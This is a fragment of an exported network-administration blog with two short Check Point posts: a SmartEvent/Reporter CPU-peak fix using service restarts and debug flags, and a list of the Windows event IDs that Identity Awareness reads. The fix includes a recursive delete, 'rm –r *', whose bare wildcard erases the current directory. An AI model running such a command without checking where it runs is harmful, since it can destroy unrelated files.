<a href="http://alpacapowered.wordpress.com/2012/08/23/running-check-point-clusterxl-member-interfaces-on-different-subnets-than-the-virtual-interfaces/" style="line-height: normal;">http://alpacapowered.wordpress.com/2012/08/23/running-check-point-clusterxl-member-interfaces-on-different-subnets-than-the-virtual-interfaces/</a> </div>
Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-10148517397862130262013-02-11T15:24:00.000+02:002013-02-11T15:39:00.236+02:00Smart Event & Reporter (CPU Peaks)<br />
<div class="MsoPlainText">
# evstop<o:p></o:p></div>
<div class="MsoPlainText">
# rm –r * $RTDIR/distrib/*<o:p></o:p></div>
<div class="MsoPlainText">
# evstart<o:p></o:p></div>
<div class="MsoPlainText">
SmartEvent konsolu içersinden policy install yapalım.<o:p></o:p></div>
<div class="MsoPlainText">
<br /></div>
<br />
<div class="MsoPlainText">
If not resolved,<o:p></o:p></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
# fw debug cpsemd on TDERROR_ALL_ALL=5 <o:p></o:p></div>
<div class="MsoPlainText">
# fw debug cpsead on TDERROR_ALL_ALL=5<o:p></o:p></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
to end debug;<o:p></o:p></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
# fw debug cpsemd off TDERROR_ALL_ALL=0 <o:p></o:p></div>
<div class="MsoPlainText">
# fw debug cpsead off TDERROR_ALL_ALL=0<o:p></o:p></div>
<div class="MsoPlainText">
<br /></div>
<div class="MsoPlainText">
Then check these files $RTDIR/log/cpsemd.elg* and $RTDIR/log/cpsead.elg*<o:p></o:p></div>
<br />Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0tag:blogger.com,1999:blog-9046774545346311334.post-90352585110303638892013-02-06T10:06:00.003+02:002013-02-06T10:06:45.779+02:00Check Point - Identity Awareness (Security Event Logs)<span style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;">Check Point Identity Awareness (had to supply all PDC in order to capture all IA.)</span><br />
<br style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;" />
<span style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;">AD Query reads these events from the Security Event log:</span><br />
<span style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;"> On Windows Server 2003 domain controllers - 672, 673, 674</span><br />
<span style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;"> On Windows Server 2008 domain controllers - 4624, 4769, 4768, 4770</span><br />
<br style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;" />
<span style="background-color: #fafafa; color: #333333; font-family: Verdana, Arial, Tahoma, Calibri, Geneva, sans-serif; font-size: 13px;">If the domain controller does not generate these events (by default they are generated), refer to Microsoft Active Directory documentation for instructions on how to configure these events.</span>Ekin Tulgahttp://www.blogger.com/profile/17836005676535762064noreply@blogger.com0